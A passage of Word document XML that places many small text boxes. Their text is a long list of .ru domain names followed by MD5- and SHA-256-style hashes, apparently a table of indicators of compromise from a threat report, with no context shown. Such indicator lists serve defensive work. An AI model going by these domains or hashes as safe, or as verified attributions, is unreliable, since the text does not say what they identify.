            <wp:wrapNone/>
            <wp:docPr id="3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mitrala.ru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4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1109287" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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iuppitertos.ru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5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879201" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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logitrap.ru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6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955897" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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herculeso.ru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7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955897" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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hordeumos.ru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8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879201" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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blakurin.ru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9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802506" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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wukongo.ru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0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7133220</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="879201" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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geminiso.ru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1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7309750</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="879201" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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kolontra.ru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2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7486280</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="879201" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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monitral.ru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3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7662810</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="955897" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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xenophorm.ru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4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7839340</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="725811" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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aluran.ru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6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8015870</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="879201" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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arcticos.ru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7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8192400</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="649116" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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hotun.ru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8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8368930</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="955897" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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bromusmos.ru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9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8545460</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="879201" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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quiapour.ru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0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8721990</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="725811" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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skilan.ru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1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8898520</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="802506" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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virgoso.ru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2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9075050</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="879201" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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venustos.ru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3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9251580</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="879201" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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mitralos.ru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4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9428110</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1032592" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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andromedas.ru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52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726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828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931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39033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136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2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802506" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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artakos.ru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3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879201" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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aurigaso.ru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4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879201" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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bootesso.ru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5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879201" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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bortorad.ru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1109287" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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caelestisto.ru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7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1109287" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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cathedrales.ru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8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879201" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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corvusso.ru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9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802506" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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dedesir.ru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0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1185983" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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distichonmos.ru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1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1109287" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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indigetesto.ru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2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879201" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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kamnotop.ru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3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1109287" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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kandrafolos.ru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4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879201" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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labellen.ru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5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879201" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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larumtos.ru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1109287" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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lesartistes.ru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7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1032592" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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lesetoiles.ru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8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802506" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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libraso.ru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9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879201" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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lopraqum.ru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0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802506" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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maplils.ru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1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879201" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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7"/>
                          </w:rPr>
                          <w:t xml:space="preserve">nikortal.ru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2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879201" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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ninjagoa.ru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3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879201" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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noprotal.ru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4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1185983" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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98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novensilesto.ru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5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879201" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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orbentis.ru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802506" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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1"/>
                          </w:rPr>
                          <w:t xml:space="preserve">orvillo.ru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7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802506" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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pohudim.ru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9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955897" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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secalemos.ru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0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879201" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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siphilos.ru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1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955897" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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7"/>
                          </w:rPr>
                          <w:t xml:space="preserve">staltulos.ru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2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955897" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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tenterons.ru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3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879201" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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visiksat.ru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4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1032592" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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dvadrugash.ru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5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725811" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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estaca.ru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6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802506" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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crudoes.ru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955897" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="32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rozalinde.ru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8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7133220</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="649116" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="32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aguas.ru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9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7309750</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="955897" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="32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9"/>
                          </w:rPr>
                          <w:t xml:space="preserve">lihoradit.ru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0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7486280</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="725811" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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madres.ru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1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7662810</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="725811" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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5"/>
                          </w:rPr>
                          <w:t xml:space="preserve">iraliv.ru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2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7839340</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="802506" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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andbien.ru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3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8015870</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1032592" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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boobasword.ru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4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8192400</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1109287" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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movingdeath.ru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5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8368930</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="725811" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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bluera.ru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6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8545460</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="725811" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="32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crokul.ru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7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8721990</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="649116" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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dafyp.ru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8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8898520</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="802506" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="32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leobard.ru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9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9075050</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="879201" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="32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letsgout.ru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0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9251580</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="725811" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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mekras.ru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1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9428110</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="879201" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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boppekax.ru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25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358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46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563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665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44768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870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9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955897" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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eleanorva.ru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0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955897" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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yourfocus.ru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1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955897" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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tilldeath.ru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2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1032592" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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bloodyhand.ru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3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879201" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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mirtogra.ru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4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879201" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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tarapost.ru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5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955897" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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6"/>
                          </w:rPr>
                          <w:t xml:space="preserve">victortes.ru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6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725811" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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grozur.ru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879201" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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bistorgo.ru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8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879201" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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soportas.ru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9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879201" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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burriton.ru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0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1032592" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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soprorotos.ru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2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802506" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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leorius.ru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3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879201" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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muchkino.ru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4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879201" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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hitorova.ru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5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879201" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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7"/>
                          </w:rPr>
                          <w:t xml:space="preserve">golfaris.ru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6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725811" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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3"/>
                          </w:rPr>
                          <w:t xml:space="preserve">sifiro.ru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7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725811" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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rotosa.ru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8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879201" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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regotras.ru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9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879201" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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frastron.ru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0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802506" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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virobas.ru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1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879201" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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fahrakin.ru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2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879201" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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siphorov.ru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3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802506" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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notoros.ru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4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802506" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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feorant.ru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5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879201" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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secretah.ru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6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1109287" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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replacemend.ru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7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955897" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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koloprast.ru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8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879201" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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billonda.ru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9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802506" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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huskino.ru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0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879201" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="32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tomatong.ru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1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955897" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="32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continiym.ru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2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879201" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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milotran.ru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3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879201" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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mopotran.ru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4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879201" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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babaskan.ru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5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7133220</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="879201" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="32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fartodti.ru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6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7309750</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="955897" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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monkyking.ru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7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7486280</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="802506" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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podriks.ru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7662810</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="725811" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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58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retrop.ru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9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7839340</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="879201" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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20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rotoslav.ru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0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8296933</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="602180" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="32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1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1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8565780</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2489244" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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1794369214b7f62e70a0485e61335c61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2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8742310</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2489244" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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8e1624d110c090ff57d4b493a9107c66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3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8918840</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2489244" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="32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bf94f4056627907d86ce1cae8b44c67a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4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9095370</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2489244" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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a2c6e01001c62f6198e31a9d603977c6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5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9271900</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2489244" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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d2a6009587b3cb73355c2d1e53d5cdfa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6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9448430</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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856584606f0bc5182d1e9d20e70c1d07f78355afc974217a128707c9e14fa6d7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785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99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092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195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50297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400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5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4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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7a7ceb023a054ef1c506283d8e606577ab690d02cea62875f2f12b9c54c91c4d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942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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ecb9609989dce48f78d4fa83abf3dae5592dd4e332d27f005e652c4f82d0b3c2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4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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79953d26671e6ae3b8d7e5d0efe63f63f6b616b50e7d3dcbf50b16fc600aef55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8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4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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48092a501ec64564e2bf2e3c79c1f96c490231abcae6ef02499570fa41d63ab2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4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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4cb1c692a2f575ca0b180eb962d04276f1e8ef43040238050e28c2f5ec95f3fb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0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4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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cad8a6efef60c5c8c530757a4e0776c8baa8f9bfc05536ab730d6b57567f6548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1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4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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ff858d25804ff6f92fedcac9360692fcff418efa3e17f863f3d48e3823036d4f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2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4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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8cf414ccbc6c02d12c41151f6806a5b57d0fb90a34c6e02f037ac9afd5f4b7d4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3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4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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57a92c3bce362ab151a6b271d5213081a13471c8c02e05640e8f50a2f13767f3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4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4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="33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7d8fdb7f19dd21dc1503307214c64da9f5ea610c46bf4bf1050a2ea132acdba6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5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4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="33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a9eae5074d2877876bb22195ac8d0697faf6e82a06f266fc52b187002c41147e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6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4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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333c408909e2a3ed9d7606b25d6284680c9d0d3247053df0ddf424f759cada0a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7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4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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95e58b54b180d811698483480c37214fccc80cc142917729afe63b759ded3151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8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4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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e3e58e8adf018f7f9cf4d4dcb3830f833cd09a4a47c1ff8bcc0e079dbff082c8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9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4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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00b8e381046d4e024a97d0402c3fe29f9d7f5114b2a932003d3e089cfdf992c1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0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4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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75adb6fe6909ea003fbd12dd8f6bdbd202afafe4f97aeda05af0536b745d6095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1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4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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8cb81e8653e47fad28467ae44c010b2e57893f387ff9533677b687aa106c5db7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2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4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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1d633fb3f1de53fdbdb8248866f56c08fde16d43bdd0f1fa0f5d6d1afb47185a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3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4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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e590c17f6bc07290482ecd75c45c006af9ba1f5120c4bb3893302b41483eb537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4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4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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b810c2835a066c517496e79c08887b9b076ca65ce9c4d631f06966706e445b3b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5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4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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72650f1a2a44251e97aa9bd97d0ac42b64b322cd0cfe262ffd7d70386d661dd7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6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4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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5ede48b619959a593775a9c5fbc0dc7b2d9a86b9e0efbc4d4e53a48d97722ebc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7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4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="33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78c8adda88904353fc3a9c7535bf9ccce5146d09e3099cc5f1667365e379d501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8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4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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24604941c68ffbcdc6636c1ca38f8476c2fd9e6e04a288ffd300428aa4fe6593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4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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22c10dff8f6a867f9d56d513f45cd7a2b0c370751960fac8972e2306098b05c4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0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4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="33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74a3422cd2c9f38347b41dd6a8c68b52df1418f71183a0a53395381b0f0ad00e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1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4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="33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7a7ceb023a054ef1c506283d8e606577ab690d02cea62875f2f12b9c54c91c4d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2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4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="33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856584606f0bc5182d1e9d20e70c1d07f78355afc974217a128707c9e14fa6d7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3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4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="33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4778adcc90e9903f1d99c93ace28b55ce9546d1815c811ac9bba6d9e5b2bed6d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4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4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="33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f1d5793184760b944a3148b7dfa7d8123ba4af5889cd04c2d0003da1989b110d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5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4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="33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3c893696f7e78fe9973f9ea16b2980fc75fa7ae4d649c045ae1a7c5c72d221ba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6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4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="33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fe62f8e5fe567500b3ad7b4b0127bc6eb6eef767b60951ae6f6e8a73e26979bb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7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4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="33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df6891b60e88e6d61f79e36b210e98c0a09cf964ea5679629235793043e4e21d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8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4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="33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cbf8017a260a33b723b76ab8e14888cddd0da9d178246eee54a449446ae4990c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4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="33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e438a4859aea79ea418fb190f68f840e701778267e1ffeaef3195ba21fe5014a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0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7133220</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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b8fb84cc850c7a2df3ab16171975ff6a92406690df6ba2bc82d44c5227f69134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1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7309750</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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63c12f66ef4bac065a4472639c62a65d88027b86d6b8d85775da0813ecd1d771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2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7486280</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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9785029fcc1d070fae4d5c6a41224a06c9aebac0f4fa04f622c041d304dee8bd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3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7662810</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4942935" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
